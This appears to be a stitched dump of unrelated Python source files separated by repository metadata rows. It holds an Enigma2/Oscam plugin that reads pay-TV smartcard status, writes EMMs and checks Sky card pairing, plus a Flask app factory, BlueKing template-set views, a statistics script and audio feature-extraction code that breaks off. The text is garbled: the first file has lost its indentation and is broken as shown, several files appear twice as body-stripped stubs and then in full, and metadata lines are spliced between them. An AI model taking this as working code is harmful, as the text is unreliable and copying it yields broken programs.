self['key_red'] = Label(_("Payload ermitteln"))
self['key_green'] = Label()
self['payload'] = Label(_("Payload: rot drücken"))
self['f0tier'] = Label()
self['cardtype'] = Label()
self['headline'] = Label()
self['expires'] = Label()
self['emmlist'] = List()
self.onLayoutFinish.append(self.showCardStatus)
def cancel(self):
self.timerRereadEmms.stop()
if self.webif:
self.webif.timer.stop()
self.close()
#
# Write selected EMM to card after confirmation.
#
def ok(self):
self.emmToWrite = str(self['emmlist'].getCurrent()[3])
if self.emmToWrite != "":
self.session.openWithCallback(
self.writeEmm,
MessageBox,
_("Folgendes EMM wirklich schreiben?\n%s") % self.emmToWrite,
type = MessageBox.TYPE_YESNO,
timeout = -1
)
#
# Fetch card payload from Oscam livelog after confirmation.
#
def red(self):
if self.oscamWebifSupport:
self.payload = None
# try to fetch payload if we are on a Sky service.
# If card is Teleclub, try to fetch payload anyway, as I don't have
# enough information for the check.
if self.isProviderSky() or self.getCardtype() == "Teleclub":
if self.oscamLivelogSupport:
self.session.openWithCallback(
self.fetchPayload,
MessageBox,
_("Das Ermitteln des Payloads dauert etwa 10 Sekunden.\nFortfahren?"),
type = MessageBox.TYPE_YESNO,
timeout = -1
)
else:
self.session.open(
MessageBox,
_("Der Payload kann nicht ermittelt werden, da Oscam ohne Livelog-Support übersetzt wurde."),
MessageBox.TYPE_INFO
)
else:
self.session.open(
MessageBox,
_("Der Payload kann nur auf einem abonnierten Sky-Sender ermittelt werden."),
MessageBox.TYPE_INFO
)
#
# Blank out emmlogdir directive in oscam.conf after confirmation.
#
def green(self):
if self.hint == OscamConfig.EMM_VAR_LOG:
self.session.openWithCallback(
self.reconfigEmmlogdir,
MessageBox,
_("Die oscam.conf kann jetzt so angepasst werden,\ndass EMM's dauerhaft gespeichert werden. Fortfahren?"),
type = MessageBox.TYPE_YESNO,
timeout = -1
)
#
# Compute text for "f0tier" label
#
def getF0text(self):
f0text = _("unbekannt")
if self.tiers:
if "00F0" in self.tiers:
f0text = _("ja")
else:
f0text = _("nein")
return f0text
#
# Compute text for "cardtype" label
#
def getCardtype(self):
cardtype = "unbekannt"
if self.status:
caid = self.status['caid']
if caid == "09C4":
cardtype = "V13"
elif caid == "098C":
cardtype = "V14"
elif caid == "09B6":
cardtype = "Teleclub"
return cardtype
#
# Compute card status information and set Screen elements accordingly.
#
def showCardStatus(self):
try:
self.getCardStatus()
self['f0tier'].setText(_("F0-Tier vorhanden: %s") % self.getF0text() )
self['cardtype'].setText( _("Kartentyp: %s") % self.getCardtype() )
if self.expires:
self['expires'].setText(_("Karte läuft ab am: %s") % str(self.expires))
else:
self['expires'].setText(_("Status konnte nicht ermittelt werden."))
if self.status:
try:
self['headline'].setText(_(self.hintText[self.hint]))
except KeyError:
pass
self['emmlist'].setList(self.list)
self.timerRereadEmms.start(60000, True)
if self.list and len(self.list) < 2 and self.hint == OscamConfig.EMM_VAR_LOG:
self['key_green'].setText(_("Emmlogdir fixen"))
else:
if self.localhostAccess:
self['headline'].setText(_("Ist Oscam gestartet? Läuft eine lokale V13/V14 Karte?"))
else:
self['headline'].setText(_("In oscam.conf muss für 127.0.0.1 Zugriff erlaubt werden."))
except WebifException as e:
self['headline'].setText(_("Das Webinterface scheint nicht konfiguriert zu sein."))
self['key_red'].setText("")
self['payload'].setText("")
def showEmms(self):
self.getSavedEmm()
if self.hint != OscamConfig.EMM_NOCHANGE:
self['emmlist'].setList(self.list)
self.timerRereadEmms.start(60000, True)
#
# Write selected EMM to card using web interface
# Callback function on OK click.
#
def writeEmm(self, retval):
if retval:
try:
self.webif.writeEmm(self.status['reader'], self.status['caid'], self.emmToWrite, self.callbackWriteEmm)
except WebifException as e:
print "[OSS OscamStatus.writeEmm] catch exception", e
#
# Web interface callback after writing EMM
#
def callbackWriteEmm(self):
try:
tiers = self.webif.getTiers(self.status['reader'])
self.expires = tiers['expires']
self['expires'].setText(_("Karte läuft ab am: %s") % str(self.expires))
except WebifException as e:
print "[OSS OscamStatus.callbackWriteEmm] catch exception", e
#
# Read payload information
# Callback action on RED click.
#
def fetchPayload(self, retval):
if retval:
self['payload'].setText(_("Payload wird ermittelt"))
try:
self.webif.fetchPayload(self.callbackFetchPayload)
except WebifException as e:
print "[OSS OscamStatus.fetchPayload] catch exception", e
#
# Web interface callback after reading payload
#
def callbackFetchPayload(self, payload):
    """Web-interface callback with the card payload.

    Stores the payload, shows it in the UI, and maps the known payload
    prefixes to a human-readable card status in a message box.
    """
    self.payload = payload
    if self.payload:
        self['payload'].setText(_("Payload: %s") % str(self.payload))
        info = ""
        # Prefix classification below; byte 2 is 04 or 06 depending on the
        # card generation.  NOTE(review): the meaning of bytes 4/5 is taken
        # from the status strings below -- confirm against card documentation.
        if self.payload.startswith("0F 04 00 00 00 00") or self.payload.startswith("0F 06 00 00 00 00"):
            info = "Die Karte ist aktiv und nicht gepairt"
        elif self.payload.startswith("0F 04 00 10 20 00") or self.payload.startswith("0F 06 00 10 20 00"):
            info = "Die Karte muss verlängert werden"
        elif self.payload.startswith("0F 04 00 10 00 00") or self.payload.startswith("0F 06 00 10 00 00"):
            info = "Die Karte ist gepairt"
        elif self.payload.startswith("0F 04 00 00 20 00") or self.payload.startswith("0F 06 00 00 20 00"):
            info = "Dieser Sender ist nicht abonniert"
        self.session.open(MessageBox, _("Der Payload ist: %s\n%s") % (self.payload, info), MessageBox.TYPE_INFO)
    else:
        self['payload'].setText(_("Payload konnte nicht ermittelt werden."))
#
# Blank out emmlogdir directive in oscam.conf
# Callback action on GREEN click if applicable
#
def reconfigEmmlogdir(self, retval):
    """Confirmation callback (GREEN button): blank the emmlogdir directive
    in oscam.conf and update the UI to the "EMM not found" state."""
    if retval:
        self.oscamConfig.reconfigEmmlogdir()
        self.hint = OscamConfig.EMM_NOT_FOUND
        # The GREEN action is no longer applicable once the fix is done.
        self['key_green'].setText('')
        self['headline'].setText(_(self.hintText[self.hint]))
#
# Check whether we are serving Sky
#
def isProviderSky(self):
    """Return True when the current service is an encrypted Sky channel.

    Sky is identified by ONID 133; "Sky 1" and free-to-air services
    (e.g. Sky News) are excluded.
    """
    service = self.session.nav.getCurrentService()
    info = service and service.info()
    if info:
        # On Sky 1 cards are reported "paired", so skip Sky 1.
        print "[OSS OscamStatus.isProviderSky] payload on", info.getName()
        # \xc2\x86/\xc2\x87 -- presumably DVB name-emphasis control codes
        # embedded in the service name; stripped before the prefix test.
        if info.getName().replace('\xc2\x86','').replace('\xc2\x87','').startswith('Sky 1'):
            return False
        # fetch ONID (Original Network ID) and make sure it belongs to Sky (133).
        onid = info.getInfo(iServiceInformation.sONID)
        # Skip services like Sky News that are FTA.
        isCrypted = info.getInfo(iServiceInformation.sIsCrypted)
        print "[OSS OscamStatus.isProviderSky] ONID=%d, isCrypted=%d" % (onid, isCrypted)
        return onid == 133 and isCrypted == 1
    return False
#
# Compute size of desktop. Screen will be chosen accordingly.
#
def adaptScreen(self):
    """Pick the skin variant from the desktop width: "hd" below 1920 px, else "fhd"."""
    desktop_width = getDesktop(0).size().width()
    self.useskin = "hd" if desktop_width < 1920 else "fhd"
| 22,163 | 6,627 | 673 |
0a5b73243a48019d002b8f2fb808eb1f41ab86fc | 2,486 | py | Python | app/__init__.py | cletuzz00/insuranceclaimfraud | 9723781ec6368f19cacc2d537ce5ebc3652ce812 | [
"MIT"
] | 23 | 2019-11-29T19:53:50.000Z | 2022-03-11T16:47:21.000Z | app/__init__.py | cletuzz00/insuranceclaimfraud | 9723781ec6368f19cacc2d537ce5ebc3652ce812 | [
"MIT"
] | 15 | 2020-03-21T20:43:05.000Z | 2020-11-09T22:15:37.000Z | app/__init__.py | cletuzz00/insuranceclaimfraud | 9723781ec6368f19cacc2d537ce5ebc3652ce812 | [
"MIT"
] | 11 | 2019-12-05T12:25:53.000Z | 2020-10-20T15:25:19.000Z | # -*- encoding: utf-8 -*-
"""
License: MIT
Copyright (c) 2019 - present AppSeed.us
"""
from flask import Flask, url_for
from flask_login import LoginManager
from flask_sqlalchemy import SQLAlchemy
from importlib import import_module
from logging import basicConfig, DEBUG, getLogger, StreamHandler
from os import path
db = SQLAlchemy()
login_manager = LoginManager()
def apply_themes(app):
"""
Add support for themes.
If DEFAULT_THEME is set then all calls to
url_for('static', filename='')
will modfify the url to include the theme name
The theme parameter can be set directly in url_for as well:
ex. url_for('static', filename='', theme='')
If the file cannot be found in the /static/<theme>/ location then
the url will not be modified and the file is expected to be
in the default /static/ location
"""
@app.context_processor
| 29.247059 | 82 | 0.672566 | # -*- encoding: utf-8 -*-
"""
License: MIT
Copyright (c) 2019 - present AppSeed.us
"""
from flask import Flask, url_for
from flask_login import LoginManager
from flask_sqlalchemy import SQLAlchemy
from importlib import import_module
from logging import basicConfig, DEBUG, getLogger, StreamHandler
from os import path
db = SQLAlchemy()
login_manager = LoginManager()
def register_extensions(app):
    """Bind the module-level SQLAlchemy and LoginManager instances to *app*."""
    for extension in (db, login_manager):
        extension.init_app(app)
def register_blueprints(app):
    """Import each application package's routes module and register its blueprint."""
    blueprint_modules = ('base', 'home')
    for module_name in blueprint_modules:
        routes = import_module('app.{}.routes'.format(module_name))
        app.register_blueprint(routes.blueprint)
def configure_database(app):
    """Register DB lifecycle hooks on *app*.

    Tables are created lazily on the first request; the scoped session is
    removed at the end of every request (including failed ones).
    """
    @app.before_first_request
    def initialize_database():
        # Create all tables known to the declarative models, once.
        db.create_all()
    @app.teardown_request
    def shutdown_session(exception=None):
        # Always release the scoped session, even when the request raised.
        db.session.remove()
def configure_logs(app):
    """Best-effort logging setup: DEBUG level to 'error.log', echoed to stderr.

    *app* is accepted for symmetry with the other configure_* helpers but is
    not used.  Any failure (e.g. an unwritable log file) is ignored so that
    logging problems never prevent the application from starting.
    """
    # soft logging
    try:
        basicConfig(filename='error.log', level=DEBUG)
        logger = getLogger()
        logger.addHandler(StreamHandler())
    except Exception:
        # Was a bare `except:`, which would also swallow SystemExit and
        # KeyboardInterrupt; Exception keeps the same best-effort behaviour.
        pass
def apply_themes(app):
    """
    Add support for themes.

    If DEFAULT_THEME is set then all calls to
      url_for('static', filename='')
      will modify the url to include the theme name

    The theme parameter can be set directly in url_for as well:
      ex. url_for('static', filename='', theme='')

    If the file cannot be found in the /static/<theme>/ location then
      the url will not be modified and the file is expected to be
      in the default /static/ location
    """
    @app.context_processor
    def override_url_for():
        # Shadow Flask's url_for inside templates with the theme-aware version.
        return dict(url_for=_generate_url_for_theme)
    def _generate_url_for_theme(endpoint, **values):
        if endpoint.endswith('static'):
            # An explicit `theme=` argument wins over the configured default.
            # NOTE(review): `theme` is not popped from values, so it is also
            # forwarded to url_for as a query parameter -- confirm intended.
            themename = values.get('theme', None) or \
                app.config.get('DEFAULT_THEME', None)
            if themename:
                theme_file = "{}/{}".format(themename, values.get('filename', ''))
                # Only rewrite when the themed file actually exists on disk.
                if path.isfile(path.join(app.static_folder, theme_file)):
                    values['filename'] = theme_file
        return url_for(endpoint, **values)
def create_app(config, selenium=False):
    """Application factory: build and fully configure the Flask app.

    config:   configuration object/class passed to app.config.from_object.
    selenium: when True, disable login checks (used for selenium test runs).
    """
    app = Flask(__name__, static_folder='base/static')
    app.config.from_object(config)
    if selenium:
        app.config['LOGIN_DISABLED'] = True
    # Order matters loosely: extensions first, then blueprints/hooks/themes.
    register_extensions(app)
    register_blueprints(app)
    configure_database(app)
    configure_logs(app)
    apply_themes(app)
    return app
| 1,425 | 0 | 168 |
a1c4e4caa2cf815e38d5be1495a90e5c6321be82 | 8,968 | py | Python | bcs-ui/backend/templatesets/legacy_apps/configuration/yaml_mode/views.py | kayinli/bk-bcs | 93a0856175f7b066ef835921572c1cac590dbd8e | [
"Apache-2.0"
] | null | null | null | bcs-ui/backend/templatesets/legacy_apps/configuration/yaml_mode/views.py | kayinli/bk-bcs | 93a0856175f7b066ef835921572c1cac590dbd8e | [
"Apache-2.0"
] | null | null | null | bcs-ui/backend/templatesets/legacy_apps/configuration/yaml_mode/views.py | kayinli/bk-bcs | 93a0856175f7b066ef835921572c1cac590dbd8e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import json
import logging
from rest_framework import viewsets
from rest_framework.renderers import BrowsableAPIRenderer
from rest_framework.response import Response
from backend.components import paas_cc
from backend.iam.permissions.decorators import response_perms
from backend.iam.permissions.resources.namespace_scoped import NamespaceScopedPermCtx, NamespaceScopedPermission
from backend.iam.permissions.resources.templateset import (
TemplatesetAction,
TemplatesetCreatorAction,
TemplatesetPermission,
TemplatesetRequest,
)
from backend.utils.error_codes import error_codes
from backend.utils.renderers import BKAPIRenderer
from backend.utils.response import PermsResponse
from ..mixins import TemplatePermission
from ..models import get_template_by_project_and_id
from ..showversion.serializers import GetLatestShowVersionSLZ, GetShowVersionSLZ
from . import init_tpls, serializers
from .deployer import DeployController
from .release import ReleaseData, ReleaseDataProcessor
logger = logging.getLogger(__name__)
| 39.857778 | 125 | 0.674286 | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import json
import logging
from rest_framework import viewsets
from rest_framework.renderers import BrowsableAPIRenderer
from rest_framework.response import Response
from backend.components import paas_cc
from backend.iam.permissions.decorators import response_perms
from backend.iam.permissions.resources.namespace_scoped import NamespaceScopedPermCtx, NamespaceScopedPermission
from backend.iam.permissions.resources.templateset import (
TemplatesetAction,
TemplatesetCreatorAction,
TemplatesetPermission,
TemplatesetRequest,
)
from backend.utils.error_codes import error_codes
from backend.utils.renderers import BKAPIRenderer
from backend.utils.response import PermsResponse
from ..mixins import TemplatePermission
from ..models import get_template_by_project_and_id
from ..showversion.serializers import GetLatestShowVersionSLZ, GetShowVersionSLZ
from . import init_tpls, serializers
from .deployer import DeployController
from .release import ReleaseData, ReleaseDataProcessor
logger = logging.getLogger(__name__)
class InitialTemplatesViewSet(viewsets.ViewSet):
    """Read-only endpoint returning the built-in (initial) template list."""

    renderer_classes = (BKAPIRenderer, BrowsableAPIRenderer)

    def get_initial_templates(self, request, project_id):
        # project_id is part of the URL route; the initial templates are global.
        return Response(init_tpls.get_initial_templates())
class YamlTemplateViewSet(viewsets.ViewSet, TemplatePermission):
    """CRUD endpoints for YAML-mode template sets (create/update/fetch)."""

    renderer_classes = (BKAPIRenderer, BrowsableAPIRenderer)

    def _request_data(self, request, **kwargs):
        """Return a copy of the request payload merged with URL kwargs."""
        request_data = request.data.copy() or {}
        logger.info(json.dumps(request_data))
        request_data.update(**kwargs)
        return request_data

    def create_template(self, request, project_id):
        """Create a template set and grant the creator IAM actions on it.

        request.data = {
            'name': '',
            'desc': '',
            'show_version': {
                'name': '',
            }
            'template_files': [{
                'resource_name': 'Deployment',
                'files': [{'name': 'nginx.yaml', 'content': 'Kind:Deployment', 'action': 'create'}]
            }]
        }
        """
        data = self._request_data(request, project_id=project_id)
        serializer = serializers.CreateTemplateSLZ(data=data, context={"request": request})
        serializer.is_valid(raise_exception=True)
        template = serializer.save()
        # Grant the creator the default resource actions in IAM so the new
        # template is immediately visible/editable by its author.
        self.iam_perm.grant_resource_creator_actions(
            TemplatesetCreatorAction(
                template_id=template.id,
                name=template.name,
                project_id=template.project_id,
                creator=request.user.username,
            )
        )
        return Response({"template_id": template.id})

    def update_template(self, request, project_id, template_id):
        """Update an existing template set (new show version / file edits).

        request.data = {
            'name': '',
            'desc': '',
            'updated_timestamp': 1595907256.0,
            'show_version': {
                'name': '',
                'old_show_version_id': '',
            }
            'template_files': [{
                'resource_name': 'Deployment',
                'files': [{'name': 'nginx.yaml', 'content': 'Kind:Deployment', 'action': 'update', 'id': 3}]
            }]
        }
        """
        template = get_template_by_project_and_id(project_id, template_id)
        data = self._request_data(request, project_id=project_id)
        serializer = serializers.UpdateTemplateSLZ(template, data=data, context={"request": request})
        serializer.is_valid(raise_exception=True)
        template = serializer.save()
        return Response({"template_id": template.id})

    def get_template_by_show_version(self, request, project_id, template_id, show_version_id):
        """Return the template files of one specific show version."""
        serializer = GetShowVersionSLZ(data=self.kwargs)
        serializer.is_valid(raise_exception=True)
        validated_data = serializer.validated_data
        template = validated_data["template"]
        self.can_view_template(request, template)
        # Query param semantics: only the literal string "false" disables file
        # content; any other value (including absent) includes it.
        with_file_content = request.query_params.get("with_file_content")
        with_file_content = False if with_file_content == "false" else True
        serializer = serializers.GetTemplateFilesSLZ(validated_data, context={"with_file_content": with_file_content})
        return Response(serializer.data)

    @response_perms(
        action_ids=[TemplatesetAction.VIEW, TemplatesetAction.UPDATE, TemplatesetAction.INSTANTIATE],
        permission_cls=TemplatesetPermission,
        resource_id_key='id',
    )
    def get_template(self, request, project_id, template_id):
        """Return the latest show version's files, annotated with IAM perms."""
        serializer = GetLatestShowVersionSLZ(data=self.kwargs)
        serializer.is_valid(raise_exception=True)
        validated_data = serializer.validated_data
        template = validated_data["template"]
        self.can_view_template(request, template)
        serializer = serializers.GetTemplateFilesSLZ(validated_data, context={"with_file_content": True})
        return PermsResponse(serializer.data, TemplatesetRequest(project_id=project_id))
class TemplateReleaseViewSet(viewsets.ViewSet, TemplatePermission):
    """Preview or apply (deploy) a YAML template release into a namespace."""

    renderer_classes = (BKAPIRenderer, BrowsableAPIRenderer)

    def _request_data(self, request, **kwargs):
        """Return a copy of the payload with URL kwargs nested under 'show_version'."""
        request_data = request.data.copy() or {}
        request_data["show_version"] = kwargs
        return request_data

    # TODO use resources module function
    def _get_namespace_info(self, access_token, project_id, namespace_id):
        """Fetch namespace info from paas-cc; raises APIError on failure."""
        resp = paas_cc.get_namespace(access_token, project_id, namespace_id)
        if resp.get("code") != 0:
            raise error_codes.APIError(f"get namespace(id:{namespace_id}) info error: {resp.get('message')}")
        return resp.get("data")

    def _raw_release_data(self, project_id, initial_data):
        """Assemble an unprocessed ReleaseData from validated request data."""
        show_version = initial_data["show_version"]
        namespace_info = self._get_namespace_info(
            self.request.user.token.access_token, project_id, initial_data["namespace_id"]
        )
        raw_release_data = ReleaseData(
            project_id=project_id,
            namespace_info=namespace_info,
            show_version=show_version["show_version"],
            template_files=initial_data["template_files"],
            template_variables=initial_data["template_variables"],
        )
        return raw_release_data

    def preview_or_apply(self, request, project_id, template_id, show_version_id):
        """Render the release (is_preview=True) or deploy it to the cluster.

        request.data = {
            'is_preview': True,
            'namespace_id': 'test',
            'template_files': [{
                'resource_name': 'Deployment',
                'files': [{'name': 'nginx.yaml', 'id': 3}]
            }],
            'template_variables': {}
        }
        """
        data = self._request_data(
            request, project_id=project_id, template_id=template_id, show_version_id=show_version_id
        )
        serializer = serializers.TemplateReleaseSLZ(data=data)
        serializer.is_valid(raise_exception=True)
        validated_data = serializer.validated_data
        template = validated_data["show_version"]["template"]
        # Template-level "use" permission check.
        self.can_use_template(request, template)
        # NOTE(review): namespace lookup failure here returns a 400-style body
        # while _get_namespace_info raises APIError -- inconsistent handling.
        resp = paas_cc.get_namespace(request.user.token.access_token, project_id, validated_data["namespace_id"])
        if resp.get('code') != 0:
            return Response(
                {
                    'code': 400,
                    'message': f"查询命名空间(namespace_id:{project_id}-{validated_data['namespace_id']})出错:{resp.get('message')}",
                }
            )
        namespace_info = resp['data']
        # Namespace-scoped "use" permission check (raises when denied).
        perm_ctx = NamespaceScopedPermCtx(
            username=request.user.username,
            project_id=project_id,
            cluster_id=namespace_info['cluster_id'],
            name=namespace_info['name'],
        )
        NamespaceScopedPermission().can_use(perm_ctx)
        # Render the templates (variable substitution etc.).
        processor = ReleaseDataProcessor(
            user=self.request.user, raw_release_data=self._raw_release_data(project_id, validated_data)
        )
        release_data = processor.release_data(is_preview=validated_data["is_preview"])
        if validated_data["is_preview"]:
            # Preview: return the rendered files without touching the cluster.
            return Response(release_data.template_files)
        # Apply: deploy the rendered release to the cluster.
        controller = DeployController(user=self.request.user, release_data=release_data)
        controller.apply()
        return Response()
| 2,428 | 4,706 | 69 |
cea3ca7316f3a8d6ec3256b07e5e310104ec5ec4 | 2,581 | py | Python | analyses/TestAnalyzer.py | ThinkNaive/Matrix-Vector-Multiplication | 9a00ba9e4d0d298ce4ff3bfae092f49571a56605 | [
"MIT"
] | null | null | null | analyses/TestAnalyzer.py | ThinkNaive/Matrix-Vector-Multiplication | 9a00ba9e4d0d298ce4ff3bfae092f49571a56605 | [
"MIT"
] | null | null | null | analyses/TestAnalyzer.py | ThinkNaive/Matrix-Vector-Multiplication | 9a00ba9e4d0d298ce4ff3bfae092f49571a56605 | [
"MIT"
] | null | null | null | # coding=utf-8
import matplotlib.pyplot as plt
import numpy as np
if __name__ == '__main__':
    # Test parameters generated by the master node.
    row = 10000
    col = 10000
    iteration = 10
    param = {'id': '3', 'strategy': 'lt', 'p': 10, 'c': 0.03, 'delta': 0.5, 'alpha': 2.0}
    params = [{'key': 'client-a'},
              {'key': 'client-b'},
              {'key': 'client-c'},
              {'key': 'client-d'},
              {'key': 'client-e'},
              {'key': 'client-f'},
              {'key': 'client-g'},
              {'key': 'client-h'},
              {'key': 'client-i'},
              {'key': 'client-j'}]

    # All statistics files share the same "Test_<strategy>_<id>" prefix;
    # build it once instead of repeating the concatenation five times.
    prefix = 'statistics/Test_' + param['strategy'] + '_' + param['id']
    keys = np.load(prefix + '_Key.npy', allow_pickle=True)
    times = np.load(prefix + '_Time.npy')
    comps = np.load(prefix + '_Comp.npy')
    stops = np.load(prefix + '_Stop.npy')
    ideals = np.load(prefix + '_Ideal.npy')

    color = ['b', 'g', 'r', 'c', 'm', 'y', 'k']
    marker = ['o', '^', 's', 'D', 'x', '*', '+']
    slave = [e['key'] for e in params]

    for key, time, comp, stop, ideal in zip(keys, times, comps, stops, ideals):  # one iteration
        # Per worker: latency, computation amount, and whether its result was
        # used (the worker appears in this iteration's key list).
        group = {}
        for i, s in enumerate(slave):
            group[s] = {
                'time': time[i],
                'comp': comp[i],
                'valid': s in key,  # idiomatic membership test (was key.__contains__(s))
            }
        print('--- iteration ---')
        print(group)

    # (plotting template kept for reference)
    # # total computation per node
    # fig = plt.figure(num=1, figsize=(6, 4), dpi=150)
    # plt.title('Computation vs Latency')
    # plt.xlabel('latency (s)')
    # plt.ylabel('computation/$m$ (ratio)')
    #
    # plt.plot(latency[0:2], computation[0:2], color=color[0], label=params[0]['strategy'].upper(), marker=marker[0])
    # plt.plot(latency[2:6], computation[2:6], color=color[1], label=params[2]['strategy'].upper(), marker=marker[1])
    # plt.plot(latency[6:12], computation[6:12], color=color[2], label=params[6]['strategy'].upper(), marker=marker[2])
    #
    # for i, (x, y) in enumerate(zip(latency[0:2], computation[0:2])):
    #     plt.annotate(r'$r$=%s' % params[i]['repNum'], xy=(x, y), xytext=(0, 5), textcoords='offset points')
    #
    # plt.legend(loc='upper left')
    # plt.savefig('figures/Param_ComputationVsLatency.svg', dpi=150, bbox_inches='tight')
    # plt.show()
| 40.968254 | 119 | 0.515304 | # coding=utf-8
import matplotlib.pyplot as plt
import numpy as np
if __name__ == '__main__':
    # Test parameters generated by the master node.
    row = 10000
    col = 10000
    iteration = 10
    param = {'id': '3', 'strategy': 'lt', 'p': 10, 'c': 0.03, 'delta': 0.5, 'alpha': 2.0}
    params = [{'key': 'client-a'},
              {'key': 'client-b'},
              {'key': 'client-c'},
              {'key': 'client-d'},
              {'key': 'client-e'},
              {'key': 'client-f'},
              {'key': 'client-g'},
              {'key': 'client-h'},
              {'key': 'client-i'},
              {'key': 'client-j'}]
    # Load the per-iteration statistics produced by a previous test run.
    keys = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Key' + '.npy', allow_pickle=True)
    times = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Time' + '.npy')
    comps = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Comp' + '.npy')
    stops = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Stop' + '.npy')
    ideals = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Ideal' + '.npy')
    color = ['b', 'g', 'r', 'c', 'm', 'y', 'k']
    marker = ['o', '^', 's', 'D', 'x', '*', '+']
    slave = [e['key'] for e in params]
    for key, time, comp, stop, ideal in zip(keys, times, comps, stops, ideals):  # one iteration
        # Per worker: latency, computation amount, and whether its result was
        # used (the worker appears in this iteration's key list).
        group = {}
        for i, s in enumerate(slave):
            group[s] = {}
            group[s]['time'] = time[i]
            group[s]['comp'] = comp[i]
            if key.__contains__(s):
                group[s]['valid'] = True
            else:
                group[s]['valid'] = False
        print('--- iteration ---')
        print(group)
    # # total computation per node (plotting template kept for reference)
    # fig = plt.figure(num=1, figsize=(6, 4), dpi=150)
    # plt.title('Computation vs Latency')
    # plt.xlabel('latency (s)')
    # plt.ylabel('computation/$m$ (ratio)')
    #
    # plt.plot(latency[0:2], computation[0:2], color=color[0], label=params[0]['strategy'].upper(), marker=marker[0])
    # plt.plot(latency[2:6], computation[2:6], color=color[1], label=params[2]['strategy'].upper(), marker=marker[1])
    # plt.plot(latency[6:12], computation[6:12], color=color[2], label=params[6]['strategy'].upper(), marker=marker[2])
    #
    # for i, (x, y) in enumerate(zip(latency[0:2], computation[0:2])):
    #     plt.annotate(r'$r$=%s' % params[i]['repNum'], xy=(x, y), xytext=(0, 5), textcoords='offset points')
    #
    # plt.legend(loc='upper left')
    # plt.savefig('figures/Param_ComputationVsLatency.svg', dpi=150, bbox_inches='tight')
    # plt.show()
| 0 | 0 | 0 |
b25c3ee2eacc5ec3f4d8e4d31557ea457f8037a6 | 8,096 | py | Python | code/feature_extraction/audio_utils.py | jonepatr/lets_face_it | fefba5e82d236f89703449bd517cfa5867fda09f | [
"MIT"
] | 11 | 2020-10-21T09:58:53.000Z | 2022-01-22T08:31:57.000Z | code/feature_extraction/audio_utils.py | jonepatr/lets_face_it | fefba5e82d236f89703449bd517cfa5867fda09f | [
"MIT"
] | 3 | 2021-05-05T07:15:45.000Z | 2021-12-14T14:43:42.000Z | code/feature_extraction/audio_utils.py | jonepatr/lets_face_it | fefba5e82d236f89703449bd517cfa5867fda09f | [
"MIT"
] | 4 | 2020-10-21T09:46:22.000Z | 2021-12-16T11:41:03.000Z | import shutil
import tempfile
from pathlib import Path
import librosa
import numpy as np
import parselmouth as pm
import scipy.io.wavfile as wav
import scipy.signal as sig
import soundfile
from misc.shared import DATA_DIR, DATASET_DIR
from pydub import AudioSegment
from python_speech_features import mfcc
from scipy.signal._savitzky_golay import savgol_filter
from tqdm import tqdm
from feature_extraction.shared import count_video_frames
def derivative(x, f):
    """ Calculate numerical derivative (by FDM) of a 1d array
    Args:
        x: input space x (in seconds; converted to milliseconds internally)
        f: Function of x
    Returns:
        der: numerical derivative of f wrt x; der[0] is 0 because the first
             sample has no preceding point to difference against
    """
    t_ms = 1000 * x  # from seconds to milliseconds
    # Assumes a uniform time step.
    dt = t_ms[1] - t_ms[0]
    # Backward differences (f[i] - f[i-1]) / dt, with a zero first sample.
    der = np.concatenate(([0.0], np.diff(f) / dt))
    return der
def extract_prosodic_features(audio_filename, nb_frames, time_step=0.02):
    """
    Extract all 4 prosodic features
    Args:
        audio_filename: file name for the audio to be used
        nb_frames: number of output frames the features are resampled to
        time_step: analysis step in seconds (default 0.02 s = 50 Hz)
    Returns:
        pros_feature: (nb_frames, 4) array: energy, energy_der, pitch, pitch_der
    """
    # Read audio from file (pydub) -- only used to obtain the total duration.
    sound = AudioSegment.from_file(audio_filename, format="wav")
    # Alternative prosodic features
    pitch, energy = compute_prosody(audio_filename, time_step)
    # pydub reports length in milliseconds.
    duration = len(sound) / 1000
    t = np.arange(0, duration, time_step)
    energy_der = derivative(t, energy)
    pitch_der = derivative(t, pitch)
    # Stack them all together
    pros_feature = np.stack((energy, energy_der, pitch, pitch_der))
    # And reshape
    pros_feature = np.transpose(pros_feature)
    # Resample from the analysis rate to the requested frame count.
    return sig.resample(pros_feature, nb_frames)
def crosstalk_vad(
    speaker1_path,
    speaker2_path,
    frame_count,
    tha=30,
    thb=5,
    savgol_win=301,
    savgol_poly_order=1,
):
    """
    Per-speaker voice activity detection robust to channel crosstalk.

    Returns two binary arrays of length frame_count (one per speaker);
    1 means that speaker alone is active.

    tha: absolute dB level for when to consider there to be speech activity in a channel
    thb: minimum difference between channels to consider it to be one speaker only
    """
    fs, x1 = wav.read(speaker1_path)
    _, x2 = wav.read(speaker2_path)
    x1 = x1.astype("float")
    x2 = x2.astype("float")
    # calculate rms energy in dB at a rate of 100 Hz (hop length 0.01 s)
    e1 = librosa.core.amplitude_to_db(
        librosa.feature.rms(x1, frame_length=int(fs * 0.02), hop_length=int(fs * 0.01))
    ).flatten()
    e2 = librosa.core.amplitude_to_db(
        librosa.feature.rms(x2, frame_length=int(fs * 0.02), hop_length=int(fs * 0.01))
    ).flatten()
    # boolean vectors at 100 Hz, s1: only speaker 1. s2: only speaker 2.
